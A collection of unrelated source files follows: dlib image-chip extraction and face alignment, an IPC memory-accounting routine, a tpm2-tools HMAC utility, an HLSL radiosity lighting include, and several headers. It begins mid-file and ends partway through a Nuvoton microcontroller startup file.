out_img) ); pyramid_up(in_img, out_img, pyr, interpolate_bilinear()); } // ---------------------------------------------------------------------------------------- template < typename image_type, typename pyramid_type > void pyramid_up ( image_type& img, const pyramid_type& pyr ) { image_type temp; pyramid_up(img, temp, pyr); swap(temp, img); } // ---------------------------------------------------------------------------------------- template < typename image_type > void pyramid_up ( image_type& img ) { pyramid_down<2> pyr; pyramid_up(img, pyr); } // ---------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------- struct chip_dims { chip_dims ( unsigned long rows_, unsigned long cols_ ) : rows(rows_), cols(cols_) { } unsigned long rows; unsigned long cols; }; struct chip_details { chip_details() : angle(0), rows(0), cols(0) {} chip_details(const rectangle& rect_) : rect(rect_),angle(0), rows(rect_.height()), cols(rect_.width()) {} chip_details(const drectangle& rect_) : rect(rect_),angle(0), rows((unsigned long)(rect_.height()+0.5)), cols((unsigned long)(rect_.width()+0.5)) {} chip_details(const drectangle& rect_, unsigned long size) : rect(rect_),angle(0) { compute_dims_from_size(size); } chip_details(const drectangle& rect_, unsigned long size, double angle_) : rect(rect_),angle(angle_) { compute_dims_from_size(size); } chip_details(const drectangle& rect_, const chip_dims& dims) : rect(rect_),angle(0),rows(dims.rows), cols(dims.cols) {} chip_details(const drectangle& rect_, const chip_dims& dims, double angle_) : rect(rect_),angle(angle_),rows(dims.rows), cols(dims.cols) {} template <typename T> chip_details( const std::vector<dlib::vector<T,2> >& chip_points, const std::vector<dlib::vector<T,2> >& img_points, const chip_dims& dims ) : rows(dims.rows), cols(dims.cols) { DLIB_CASSERT( chip_points.size() == img_points.size() && chip_points.size() >= 2, "\t chip_details::chip_details(chip_points,img_points,dims)" << "\n\t Invalid inputs were given to this function." << "\n\t chip_points.size(): " << chip_points.size() << "\n\t img_points.size(): " << img_points.size() ); const point_transform_affine tform = find_similarity_transform(chip_points,img_points); dlib::vector<double,2> p(1,0); p = tform.get_m()*p; // There are only 3 things happening in a similarity transform. There is a // rescaling, a rotation, and a translation. So here we pick out the scale and // rotation parameters. angle = std::atan2(p.y(),p.x()); // Note that the translation and scale part are represented by the extraction // rectangle. So here we build the appropriate rectangle. const double scale = length(p); rect = centered_drect(tform(point(dims.cols,dims.rows)/2.0), dims.cols*scale, dims.rows*scale); } drectangle rect; double angle; unsigned long rows; unsigned long cols; inline unsigned long size() const { return rows*cols; } private: void compute_dims_from_size ( unsigned long size ) { const double relative_size = std::sqrt(size/(double)rect.area()); rows = static_cast<unsigned long>(rect.height()*relative_size + 0.5); cols = static_cast<unsigned long>(size/(double)rows + 0.5); rows = std::max(1ul,rows); cols = std::max(1ul,cols); } }; // ---------------------------------------------------------------------------------------- inline point_transform_affine get_mapping_to_chip ( const chip_details& details ) { std::vector<dlib::vector<double,2> > from, to; point p1(0,0); point p2(details.cols-1,0); point p3(details.cols-1, details.rows-1); to.push_back(p1); from.push_back(rotate_point<double>(center(details.rect),details.rect.tl_corner(),details.angle)); to.push_back(p2); from.push_back(rotate_point<double>(center(details.rect),details.rect.tr_corner(),details.angle)); to.push_back(p3); from.push_back(rotate_point<double>(center(details.rect),details.rect.br_corner(),details.angle)); return find_affine_transform(from, to); } // ---------------------------------------------------------------------------------------- inline full_object_detection map_det_to_chip( const full_object_detection& det, const chip_details& details ) { point_transform_affine tform = get_mapping_to_chip(details); full_object_detection res(det); // map the parts for (unsigned long l = 0; l < det.num_parts(); ++l) res.part(l) = tform(det.part(l)); // map the main rectangle rectangle rect; rect += tform(det.get_rect().tl_corner()); rect += tform(det.get_rect().tr_corner()); rect += tform(det.get_rect().bl_corner()); rect += tform(det.get_rect().br_corner()); res.get_rect() = rect; return res; } // ---------------------------------------------------------------------------------------- namespace impl { template < typename image_type1, typename image_type2 > void basic_extract_image_chip ( const image_type1& img, const rectangle& location, image_type2& chip ) /*! ensures - This function doesn't do any scaling or rotating. It just pulls out the chip in the given rectangle. This also means the output image has the same dimensions as the location rectangle. !*/ { const_image_view<image_type1> vimg(img); image_view<image_type2> vchip(chip); vchip.set_size(location.height(), location.width()); // location might go outside img so clip it rectangle area = location.intersect(get_rect(img)); // find the part of the chip that corresponds to area in img. rectangle chip_area = translate_rect(area, -location.tl_corner()); zero_border_pixels(chip, chip_area); // now pull out the contents of area/chip_area. for (long r = chip_area.top(), rr = area.top(); r <= chip_area.bottom(); ++r,++rr) { for (long c = chip_area.left(), cc = area.left(); c <= chip_area.right(); ++c,++cc) { assign_pixel(vchip[r][c], vimg[rr][cc]); } } } } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2 > void extract_image_chips ( const image_type1& img, const std::vector<chip_details>& chip_locations, dlib::array<image_type2>& chips ) { // make sure requires clause is not broken #ifdef ENABLE_ASSERTS for (unsigned long i = 0; i < chip_locations.size(); ++i) { DLIB_CASSERT(chip_locations[i].size() != 0 && chip_locations[i].rect.is_empty() == false, "\t void extract_image_chips()" << "\n\t Invalid inputs were given to this function." << "\n\t chip_locations["<<i<<"].size(): " << chip_locations[i].size() << "\n\t chip_locations["<<i<<"].rect.is_empty(): " << chip_locations[i].rect.is_empty() ); } #endif pyramid_down<2> pyr; long max_depth = 0; // If the chip is supposed to be much smaller than the source subwindow then you // can't just extract it using bilinear interpolation since at a high enough // downsampling amount it would effectively turn into nearest neighbor // interpolation. So we use an image pyramid to make sure the interpolation is // fast but also high quality. The first thing we do is figure out how deep the // image pyramid needs to be. rectangle bounding_box; for (unsigned long i = 0; i < chip_locations.size(); ++i) { long depth = 0; double grow = 2; drectangle rect = pyr.rect_down(chip_locations[i].rect); while (rect.area() > chip_locations[i].size()) { rect = pyr.rect_down(rect); ++depth; // We drop the image size by a factor of 2 each iteration and then assume a // border of 2 pixels is needed to avoid any border effects of the crop. grow = grow*2 + 2; } drectangle rot_rect; const vector<double,2> cent = center(chip_locations[i].rect); rot_rect += rotate_point<double>(cent,chip_locations[i].rect.tl_corner(),chip_locations[i].angle); rot_rect += rotate_point<double>(cent,chip_locations[i].rect.tr_corner(),chip_locations[i].angle); rot_rect += rotate_point<double>(cent,chip_locations[i].rect.bl_corner(),chip_locations[i].angle); rot_rect += rotate_point<double>(cent,chip_locations[i].rect.br_corner(),chip_locations[i].angle); bounding_box += grow_rect(rot_rect, grow).intersect(get_rect(img)); max_depth = std::max(depth,max_depth); } //std::cout << "max_depth: " << max_depth << std::endl; //std::cout << "crop amount: " << bounding_box.area()/(double)get_rect(img).area() << std::endl; // now make an image pyramid dlib::array<array2d<typename image_traits<image_type1>::pixel_type> > levels(max_depth); if (levels.size() != 0) pyr(sub_image(img,bounding_box),levels[0]); for (unsigned long i = 1; i < levels.size(); ++i) pyr(levels[i-1],levels[i]); std::vector<dlib::vector<double,2> > from, to; // now pull out the chips chips.resize(chip_locations.size()); for (unsigned long i = 0; i < chips.size(); ++i) { // If the chip doesn't have any rotation or scaling then use the basic version // of chip extraction that just does a fast copy. if (chip_locations[i].angle == 0 && chip_locations[i].rows == chip_locations[i].rect.height() && chip_locations[i].cols == chip_locations[i].rect.width()) { impl::basic_extract_image_chip(img, chip_locations[i].rect, chips[i]); } else { set_image_size(chips[i], chip_locations[i].rows, chip_locations[i].cols); // figure out which level in the pyramid to use to extract the chip int level = -1; drectangle rect = translate_rect(chip_locations[i].rect, -bounding_box.tl_corner()); while (pyr.rect_down(rect).area() > chip_locations[i].size()) { ++level; rect = pyr.rect_down(rect); } // find the appropriate transformation that maps from the chip to the input // image from.clear(); to.clear(); from.push_back(get_rect(chips[i]).tl_corner()); to.push_back(rotate_point<double>(center(rect),rect.tl_corner(),chip_locations[i].angle)); from.push_back(get_rect(chips[i]).tr_corner()); to.push_back(rotate_point<double>(center(rect),rect.tr_corner(),chip_locations[i].angle)); from.push_back(get_rect(chips[i]).bl_corner()); to.push_back(rotate_point<double>(center(rect),rect.bl_corner(),chip_locations[i].angle)); point_transform_affine trns = find_affine_transform(from,to); // now extract the actual chip if (level == -1) transform_image(sub_image(img,bounding_box),chips[i],interpolate_bilinear(),trns); else transform_image(levels[level],chips[i],interpolate_bilinear(),trns); } } } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2 > void extract_image_chip ( const image_type1& img, const chip_details& location, image_type2& chip ) { // If the chip doesn't have any rotation or scaling then use the basic version of // chip extraction that just does a fast copy. if (location.angle == 0 && location.rows == location.rect.height() && location.cols == location.rect.width()) { impl::basic_extract_image_chip(img, location.rect, chip); } else { std::vector<chip_details> chip_locations(1,location); dlib::array<image_type2> chips; extract_image_chips(img, chip_locations, chips); swap(chips[0], chip); } } // ---------------------------------------------------------------------------------------- inline chip_details get_face_chip_details ( const full_object_detection& det, const unsigned long size = 200, const double padding = 0.2 ) { DLIB_CASSERT(det.num_parts() == 68, "\t chip_details get_face_chip_details()" << "\n\t You must give a detection with exactly 68 parts in it." << "\n\t det.num_parts(): " << det.num_parts() ); DLIB_CASSERT(padding >= 0 && size > 0, "\t chip_details get_face_chip_details()" << "\n\t Invalid inputs were given to this function." << "\n\t padding: " << padding << "\n\t size: " << size ); // Average positions of face points 17-67 const double mean_face_shape_x[] = { 0.000213256, 0.0752622, 0.18113, 0.29077, 0.393397, 0.586856, 0.689483, 0.799124, 0.904991, 0.98004, 0.490127, 0.490127, 0.490127, 0.490127, 0.36688, 0.426036, 0.490127, 0.554217, 0.613373, 0.121737, 0.187122, 0.265825, 0.334606, 0.260918, 0.182743, 0.645647, 0.714428, 0.793132, 0.858516, 0.79751, 0.719335, 0.254149, 0.340985, 0.428858, 0.490127, 0.551395, 0.639268, 0.726104, 0.642159, 0.556721, 0.490127, 0.423532, 0.338094, 0.290379, 0.428096, 0.490127, 0.552157, 0.689874, 0.553364, 0.490127, 0.42689 }; const double mean_face_shape_y[] = { 0.106454, 0.038915, 0.0187482, 0.0344891, 0.0773906, 0.0773906, 0.0344891, 0.0187482, 0.038915, 0.106454, 0.203352, 0.307009, 0.409805, 0.515625, 0.587326, 0.609345, 0.628106, 0.609345, 0.587326, 0.216423, 0.178758, 0.179852, 0.231733, 0.245099, 0.244077, 0.231733, 0.179852, 0.178758, 0.216423, 0.244077, 0.245099, 0.780233, 0.745405, 0.727388, 0.742578, 0.727388, 0.745405, 0.780233, 0.864805, 0.902192, 0.909281, 0.902192, 0.864805, 0.784792, 0.778746, 0.785343, 0.778746, 0.784792, 0.824182, 0.831803, 0.824182 }; COMPILE_TIME_ASSERT(sizeof(mean_face_shape_x)/sizeof(double) == 68-17); std::vector<dlib::vector<double,2> > from_points, to_points; for (unsigned long i = 17; i < det.num_parts(); ++i) { // Ignore the lower lip if ((55 <= i && i <= 59) || (65 <= i && i <= 67)) continue; // Ignore the eyebrows if (17 <= i && i <= 26) continue; dlib::vector<double,2> p; p.x() = (padding+mean_face_shape_x[i-17])/(2*padding+1); p.y() = (padding+mean_face_shape_y[i-17])/(2*padding+1); from_points.push_back(p*size); to_points.push_back(det.part(i)); } return chip_details(from_points, to_points, chip_dims(size,size)); } // ---------------------------------------------------------------------------------------- inline std::vector<chip_details> get_face_chip_details ( const std::vector<full_object_detection>& dets, const unsigned long size = 200, const double padding = 0.2 ) { std::vector<chip_details> res; res.reserve(dets.size()); for (unsigned long i = 0; i < dets.size(); ++i) res.push_back(get_face_chip_details(dets[i], size, padding)); return res; } // ---------------------------------------------------------------------------------------- } #endif // DLIB_INTERPOlATIONh_
/* Copyright (c) 2015,2016 Jeremy Iverson Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ #ifndef _GNU_SOURCE # define _GNU_SOURCE 1 #endif #include <stddef.h> /* size_t */ #include "common.h" #include "ipc.h" #include "sbma.h" /*****************************************************************************/ /* MP-Unsafe race:rw(ipc->s_mem,ipc->c_mem[ipc->id]) */ /* race:wr(ipc->d_mem[ipc->id]) */ /* MT-Unsafe race:rw(ipc->s_mem,ipc->c_mem[ipc->id]) */ /* */ /* Note: */ /* 1) Only other threads from this process will ever modify */ /* ipc->d_mem[ipc->id], so the IPC_INTRA_CRICITAL_SECTION is */ /* sufficient to make that variable MT-Safe. */ /* */ /* Mitigation: */ /* 1) Call from within an IPC_INTER_CRITICAL_SECTION or call after */ /* receiving SIGIPC from a process in an IPC_INTER_CRITICAL_SECTION. */ /* 2) Functions that READ ipc->d_mem[ipc->id] from a different process */ /* SHOULD be aware of the possibility of reading a stale value. */ /*****************************************************************************/ SBMA_EXTERN void ipc_atomic_dec(struct ipc * const ipc, size_t const c_pages, size_t const d_pages) { /*=========================================================================*/ IPC_INTRA_CRITICAL_SECTION_BEG(ipc); /*=========================================================================*/ ASSERT(ipc->c_mem[ipc->id] >= c_pages); ASSERT(ipc->d_mem[ipc->id] >= d_pages); *ipc->s_mem += c_pages; ipc->c_mem[ipc->id] -= c_pages; ipc->d_mem[ipc->id] -= d_pages; /*=========================================================================*/ IPC_INTRA_CRITICAL_SECTION_END(ipc); /*=========================================================================*/ } #ifdef TEST int main(int argc, char * argv[]) { if (0 == argc || NULL == argv) {} return 0; } #endif
// // FNFullImageAnimation.h // FNMarket // // Created by fuyong on 15/5/7. // Copyright (c) 2015年 cn.com.feiniu. All rights reserved. // #import <UIKit/UIKit.h> #import "FNBaseAnimatedTransitioning.h" @interface FNFullImageAnimation : FNBaseAnimatedTransitioning @property (nonatomic, strong) UIImage *image; @property (nonatomic, assign) CGRect originalFrame; @end
/* SPDX-License-Identifier: BSD-3-Clause */ #include <assert.h> #include <errno.h> #include <stdbool.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include "files.h" #include "log.h" #include "tpm2.h" #include "tpm2_alg_util.h" #include "tpm2_tool.h" typedef struct tpm_hmac_ctx tpm_hmac_ctx; struct tpm_hmac_ctx { struct { char *ctx_path; char *auth_str; tpm2_loaded_object object; } hmac_key; FILE *input; char *hmac_output_file_path; char *ticket_path; TPMI_ALG_HASH halg; bool hex; char *cp_hash_path; }; static tpm_hmac_ctx ctx; static tool_rc tpm_hmac_file(ESYS_CONTEXT *ectx, TPM2B_DIGEST **result, TPMT_TK_HASHCHECK **validation) { unsigned long file_size = 0; FILE *input = ctx.input; tool_rc rc; /* Suppress error reporting with NULL path */ bool res = files_get_file_size(input, &file_size, NULL); /* * If we can get the file size and its less than 1024, just do it in one hash invocation. * We can't use the one-shot command if we require ticket, as it doesn't provide it in * the response from the TPM. */ if (!ctx.ticket_path && res && file_size <= TPM2_MAX_DIGEST_BUFFER) { TPM2B_MAX_BUFFER buffer = { .size = file_size }; res = files_read_bytes(ctx.input, buffer.buffer, buffer.size); if (!res) { LOG_ERR("Error reading input file!"); return tool_rc_general_error; } if (ctx.cp_hash_path) { LOG_WARN("Exiting without performing HMAC when calculating cpHash"); TPM2B_DIGEST cp_hash = { .size = 0 }; tool_rc rc = tpm2_hmac(ectx, &ctx.hmac_key.object, ctx.halg, &buffer, result, &cp_hash); if (rc != tool_rc_success) { return rc; } bool result = files_save_digest(&cp_hash, ctx.cp_hash_path); if (!result) { rc = tool_rc_general_error; } return rc; } /* * hash algorithm specified in the key's scheme is used as the * hash algorithm for the HMAC */ return tpm2_hmac(ectx, &ctx.hmac_key.object, ctx.halg, &buffer, result, NULL); } if (ctx.cp_hash_path) { LOG_ERR("Cannot calculate cpHash for buffers requiring HMAC sequence."); return tool_rc_general_error; } ESYS_TR sequence_handle; /* * Size is either unknown because the FILE * is a fifo, or it's too big * to do in a single hash call. Based on the size figure out the chunks * to loop over, if possible. This way we can call Complete with data. */ rc = tpm2_hmac_start(ectx, &ctx.hmac_key.object, ctx.halg, &sequence_handle); if (rc != tool_rc_success) { return rc; } /* If we know the file size, we decrement the amount read and terminate the * loop when 1 block is left, else we go till feof. */ size_t left = file_size; bool use_left = !!res; TPM2B_MAX_BUFFER data; bool done = false; while (!done) { size_t bytes_read = fread(data.buffer, 1, BUFFER_SIZE(typeof(data), buffer), input); if (ferror(input)) { LOG_ERR("Error reading from input file"); return tool_rc_general_error; } data.size = bytes_read; /* if data was read, update the sequence */ rc = tpm2_hmac_sequenceupdate(ectx, sequence_handle, &ctx.hmac_key.object, &data); if (rc != tool_rc_success) { return rc; } if (use_left) { left -= bytes_read; if (left <= TPM2_MAX_DIGEST_BUFFER) { done = true; continue; } } else if (feof(input)) { done = true; } } /* end file read/hash update loop */ if (use_left) { data.size = left; bool res = files_read_bytes(input, data.buffer, left); if (!res) { LOG_ERR("Error reading from input file."); return tool_rc_general_error; } } else { data.size = 0; } rc = tpm2_hmac_sequencecomplete(ectx, sequence_handle, &ctx.hmac_key.object, &data, result, validation); if (rc != tool_rc_success) { return rc; } return tool_rc_success; } static tool_rc do_hmac_and_output(ESYS_CONTEXT *ectx) { TPM2B_DIGEST *hmac_out = NULL; TPMT_TK_HASHCHECK *validation = NULL; FILE *out = stdout; tool_rc rc = tpm_hmac_file(ectx, &hmac_out, &validation); if (rc != tool_rc_success || ctx.cp_hash_path) { goto out; } assert(hmac_out); if (ctx.ticket_path) { bool res = files_save_validation(validation, ctx.ticket_path); if (!res) { rc = tool_rc_general_error; goto out; } } rc = tool_rc_general_error; if (ctx.hmac_output_file_path) { out = fopen(ctx.hmac_output_file_path, "wb+"); if (!out) { LOG_ERR("Could not open output file \"%s\", error: %s", ctx.hmac_output_file_path, strerror(errno)); goto out; } } else if (!output_enabled) { rc = tool_rc_success; goto out; } if (ctx.hex) { tpm2_util_print_tpm2b2(out, hmac_out); } else { bool res = files_write_bytes(out, hmac_out->buffer, hmac_out->size); if (!res) { goto out; } } rc = tool_rc_success; out: if (out && out != stdout) { fclose(out); } free(hmac_out); free(validation); return rc; } static bool on_option(char key, char *value) { switch (key) { case 'c': ctx.hmac_key.ctx_path = value; break; case 'p': ctx.hmac_key.auth_str = value; break; case 'o': ctx.hmac_output_file_path = value; break; case 'g': ctx.halg = tpm2_alg_util_from_optarg(value, tpm2_alg_util_flags_hash); if (ctx.halg == TPM2_ALG_ERROR) { return false; } break; case 't': ctx.ticket_path = value; break; case 0: ctx.hex = true; break; case 1: ctx.cp_hash_path = value; break; /* no default */ } return true; } static bool on_args(int argc, char **argv) { if (argc > 1) { LOG_ERR("Expected 1 hmac input file, got: %d", argc); return false; } ctx.input = fopen(argv[0], "rb"); if (!ctx.input) { LOG_ERR("Error opening file \"%s\", error: %s", argv[0], strerror(errno)); return false; } return true; } bool tpm2_tool_onstart(tpm2_options **opts) { const struct option topts[] = { { "key-context", required_argument, NULL, 'c' }, { "auth", required_argument, NULL, 'p' }, { "output", required_argument, NULL, 'o' }, { "hash-algorithm", required_argument, NULL, 'g' }, { "ticket", required_argument, NULL, 't' }, { "hex", no_argument, NULL, 0 }, { "cphash", required_argument, NULL, 1 }, }; ctx.input = stdin; *opts = tpm2_options_new("c:p:o:g:t:", ARRAY_LEN(topts), topts, on_option, on_args, 0); return *opts != NULL; } static tool_rc readpub(ESYS_CONTEXT *ectx, ESYS_TR handle, TPM2B_PUBLIC **public) { return tpm2_readpublic(ectx, handle, public, NULL, NULL); } tool_rc tpm2_tool_onrun(ESYS_CONTEXT *ectx, tpm2_option_flags flags) { UNUSED(flags); /* * Option C must be specified. */ if (!ctx.hmac_key.ctx_path) { LOG_ERR("Must specify options C."); return tool_rc_option_error; } tool_rc rc = tpm2_util_object_load_auth(ectx, ctx.hmac_key.ctx_path, ctx.hmac_key.auth_str, &ctx.hmac_key.object, false, TPM2_HANDLE_ALL_W_NV); if (rc != tool_rc_success) { LOG_ERR("Invalid key handle authorization"); return rc; } /* * if no halg was specified, read the public portion of the key and use it's * scheme */ if (!ctx.halg) { TPM2B_PUBLIC *pub = NULL; rc = readpub(ectx, ctx.hmac_key.object.tr_handle, &pub); if (rc != tool_rc_success) { return rc; } /* * if we're attempting to figure out a hashing scheme, and the scheme is NULL * we default to sha256. */ ctx.halg = pub->publicArea.parameters.keyedHashDetail.scheme.details.hmac.hashAlg; if (ctx.halg == TPM2_ALG_NULL) { ctx.halg = TPM2_ALG_SHA256; } free(pub); } return do_hmac_and_output(ectx); } tool_rc tpm2_tool_onstop(ESYS_CONTEXT *ectx) { UNUSED(ectx); if (ctx.input && ctx.input != stdin) { fclose(ctx.input); } return tpm2_session_close(&ctx.hmac_key.object.session); }
#ifndef COMMON_LIGHTING_H #define COMMON_LIGHTING_H static const float3 flWorldGridSize = float3( RADIOSITY_BUFFER_GRID_STEP_SIZE_CLOSE * RADIOSITY_BUFFER_SAMPLES_XY, RADIOSITY_BUFFER_GRID_STEP_SIZE_CLOSE * RADIOSITY_BUFFER_SAMPLES_XY, RADIOSITY_BUFFER_GRID_STEP_SIZE_CLOSE * RADIOSITY_BUFFER_SAMPLES_Z ); static const float3 flWorldGridSize_Far = float3( RADIOSITY_BUFFER_GRID_STEP_SIZE_FAR * RADIOSITY_BUFFER_SAMPLES_XY, RADIOSITY_BUFFER_GRID_STEP_SIZE_FAR * RADIOSITY_BUFFER_SAMPLES_XY, RADIOSITY_BUFFER_GRID_STEP_SIZE_FAR * RADIOSITY_BUFFER_SAMPLES_Z ); static const float2 flRadiosityTexelSizeHalf = float2( 0.5f / RADIOSITY_BUFFER_RES_X, 0.5f / RADIOSITY_BUFFER_RES_Y ); static const float2 flRadiosityUVRatio = float2( RADIOSITY_UVRATIO_X, RADIOSITY_UVRATIO_Y ); float3 DoStandardCookie( sampler sCookie, float2 uvs ) { return tex2D( sCookie, uvs ).rgb; } float3 DoCubemapCookie( sampler sCubemap, float3 delta ) { return texCUBE( sCubemap, delta ).rgb; } float4 DoLightFinal( float3 diffuse, float3 ambient, float4 litdot_lamount_spec_fade ) { #if DEFCFG_CHEAP_LIGHTS return float4( diffuse * litdot_lamount_spec_fade.y, 0 ); #else return float4( lerp( ambient, diffuse * ( litdot_lamount_spec_fade.x ), litdot_lamount_spec_fade.y ), litdot_lamount_spec_fade.z * litdot_lamount_spec_fade.y ) * litdot_lamount_spec_fade.w; #endif } float4 DoLightFinalCookied( float3 diffuse, float3 ambient, float4 litdot_lamount_spec_fade, float3 vecCookieRGB ) { #if DEFCFG_CHEAP_LIGHTS return float4( diffuse * vecCookieRGB * litdot_lamount_spec_fade.y, 0 ); #else return float4( lerp( ambient, diffuse * vecCookieRGB * ( litdot_lamount_spec_fade.x ), litdot_lamount_spec_fade.y ), litdot_lamount_spec_fade.z * litdot_lamount_spec_fade.y * dot( vecCookieRGB, float3( 0.3f, 0.59f, 0.11f ) ) ) * litdot_lamount_spec_fade.w; #endif } float3 GetBilinearRadiositySample( sampler RadiositySampler, float3 vecPositionDelta, float2 vecUVOffset ) { float2 flGridUVLocal = vecPositionDelta.xy / RADIOSITY_BUFFER_GRIDS_PER_AXIS; float2 flGridIndexSplit; flGridIndexSplit.x = modf( vecPositionDelta.z * RADIOSITY_BUFFER_GRIDS_PER_AXIS, flGridIndexSplit.y ); flGridIndexSplit.x *= RADIOSITY_BUFFER_GRIDS_PER_AXIS; float flSampleFrac = modf( flGridIndexSplit.x, flGridIndexSplit.x ); flGridIndexSplit /= RADIOSITY_BUFFER_GRIDS_PER_AXIS; float2 flGridUVLow = flRadiosityUVRatio * (flGridUVLocal + flGridIndexSplit) + flRadiosityTexelSizeHalf; flGridIndexSplit.x = modf( ( floor( vecPositionDelta.z * RADIOSITY_BUFFER_SAMPLES_Z ) + 1 ) / RADIOSITY_BUFFER_GRIDS_PER_AXIS, flGridIndexSplit.y ); flGridIndexSplit.y /= RADIOSITY_BUFFER_GRIDS_PER_AXIS; float2 flGridUVHigh = flRadiosityUVRatio * (flGridUVLocal + flGridIndexSplit) + flRadiosityTexelSizeHalf; return lerp( tex2D( RadiositySampler, flGridUVLow + vecUVOffset ).rgb, tex2D( RadiositySampler, flGridUVHigh + vecUVOffset ).rgb, flSampleFrac ); } float3 DoRadiosity( float3 worldPos, sampler RadiositySampler, float3 vecRadiosityOrigin, float3 vecRadiosityOrigin_Far, float flRadiositySettings ) { #if RADIOSITY_SMOOTH_TRANSITION == 1 float3 vecDeltaFar = ( worldPos - vecRadiosityOrigin_Far ) / flWorldGridSize_Far; #if VENDOR == VENDOR_FXC_AMD AMD_PRE_5K_NON_COMPLIANT #elif ( DEFCFG_DEFERRED_SHADING == 0 ) clip( 0.5f - any( floor( vecDeltaFar ) ) ); #else flRadiositySettings *= 1 - any( floor( vecDeltaFar ) ); #endif float3 vecDeltaClose = ( worldPos - vecRadiosityOrigin ) / flWorldGridSize; float3 flTransition = abs( saturate( vecDeltaClose ) * 2 - 1 ); float flBlendAmt = max( flTransition.x, max( flTransition.y, flTransition.z ) ); flBlendAmt = smoothstep( 0.7f, 1.0f, flBlendAmt ); return lerp( GetBilinearRadiositySample( RadiositySampler, vecDeltaClose, float2(0,0) ), GetBilinearRadiositySample( RadiositySampler, vecDeltaFar, float2(0,0.5f) ), flBlendAmt ) * flRadiositySettings.x; #else float3 vecDelta = ( worldPos - vecRadiosityOrigin ) / flWorldGridSize; #if VENDOR == VENDOR_FXC_AMD AMD_PRE_5K_NON_COMPLIANT #else float flLerpTo1 = any( floor( (vecDelta.xyz - 0.025f) * 1.05f) ); #endif vecDelta = lerp( vecDelta, ( worldPos - vecRadiosityOrigin_Far ) / flWorldGridSize_Far, flLerpTo1 ); float2 flUV_Y_Offset = float2( 0, flLerpTo1 ) * 0.5f; #if VENDOR == VENDOR_FXC_AMD AMD_PRE_5K_NON_COMPLIANT #elif ( DEFCFG_DEFERRED_SHADING == 0 ) clip( 0.5f - any( floor( vecDelta ) ) ); #else flRadiositySettings *= 1 - any( floor( vecDeltaFar ) ); #endif return GetBilinearRadiositySample( RadiositySampler, vecDelta, flUV_Y_Offset ) * flRadiositySettings.x; #endif } #endif
#ifndef TREE_HEADER #define TREE_HEADER #include <stdio.h> #include <stdlib.h> #include <stdarg.h> typedef enum { typeCon, typeId, typeOpr, typeFunc} nodeEnum; typedef struct { int value; } conNodeType; typedef struct { int i; } idNodeType; typedef struct { char *name; } funcNodeType; typedef struct { int oper; int nops; struct nodeTypeTag *op[1]; } oprNodeType; typedef struct nodeTypeTag{ nodeEnum type; union { conNodeType con; idNodeType id; funcNodeType func; oprNodeType opr; }; } nodeType; extern int sym[26]; #endif
/* Generated by RuntimeBrowser Image: /System/Library/PrivateFrameworks/DoNotDisturbServer.framework/DoNotDisturbServer */ @interface DNDSSettingsRecord : NSObject <DNDSBackingStoreRecord, NSCopying, NSMutableCopying> { DNDSBehaviorSettingsRecord * _behaviorSettings; DNDSBypassSettingsRecord * _phoneCallBypassSettings; DNDSScheduleSettingsRecord * _scheduleSettings; } @property (nonatomic, readonly, copy) DNDSBehaviorSettingsRecord *behaviorSettings; @property (readonly, copy) NSString *debugDescription; @property (readonly, copy) NSString *description; @property (readonly) unsigned long long hash; @property (nonatomic, readonly, copy) DNDSBypassSettingsRecord *phoneCallBypassSettings; @property (nonatomic, readonly, copy) DNDSScheduleSettingsRecord *scheduleSettings; @property (readonly) Class superclass; + (id)backingStoreWithFileURL:(id)arg1; + (id)migrateDictionaryRepresentation:(id)arg1 fromVersionNumber:(unsigned long long)arg2 toVersionNumber:(unsigned long long)arg3; + (id)recordWithEncodedInfo:(id)arg1 error:(id*)arg2; - (void).cxx_destruct; - (id)_initWithBehaviorSettings:(id)arg1 phoneCallBypassSettings:(id)arg2 scheduleSettings:(id)arg3; - (id)_initWithRecord:(id)arg1; - (id)behaviorSettings; - (id)copyWithZone:(struct _NSZone { }*)arg1; - (id)description; - (id)dictionaryRepresentation; - (unsigned long long)hash; - (id)init; - (id)initWithDictionaryRepresentation:(id)arg1; - (bool)isEqual:(id)arg1; - (id)mutableCopyWithZone:(struct _NSZone { }*)arg1; - (id)phoneCallBypassSettings; - (id)scheduleSettings; @end
/****************************************************************************** * @file startup_M451Series.c * @version V0.10 * $Revision: 11 $ * $Date: 15/09/02 10:02a $ * @brief CMSIS Cortex-M4 Core Peripheral Access Layer Source File for M451 Series MCU * * @note * Copyright (C) 2013~2015 Nuvoton Technology Corp. All rights reserved. *****************************************************************************/ #include "M451Series.h" /* Suppress warning messages */ #if defined(__CC_ARM) // Suppress warning message: extended constant initialiser used #pragma diag_suppress 1296 #elif defined(__ICCARM__) #elif defined(__GNUC__) #endif /* Macro Definitions */ #if defined(__CC_ARM) #define WEAK __attribute__ ((weak)) #define ALIAS(f) __attribute__ ((weak, alias(#f))) #define WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) \ void FUN(void) __attribute__ ((weak, alias(#FUN_ALIAS))); #elif defined(__ICCARM__) //#define STRINGIFY(x) #x //#define _STRINGIFY(x) STRINGIFY(x) #define WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) \ void FUN(void); \ _Pragma(_STRINGIFY(_WEAK_ALIAS_FUNC(FUN, FUN_ALIAS))) #define _WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) weak __WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) #define __WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) FUN##=##FUN_ALIAS #elif defined(__GNUC__) #define WEAK __attribute__ ((weak)) #define ALIAS(f) 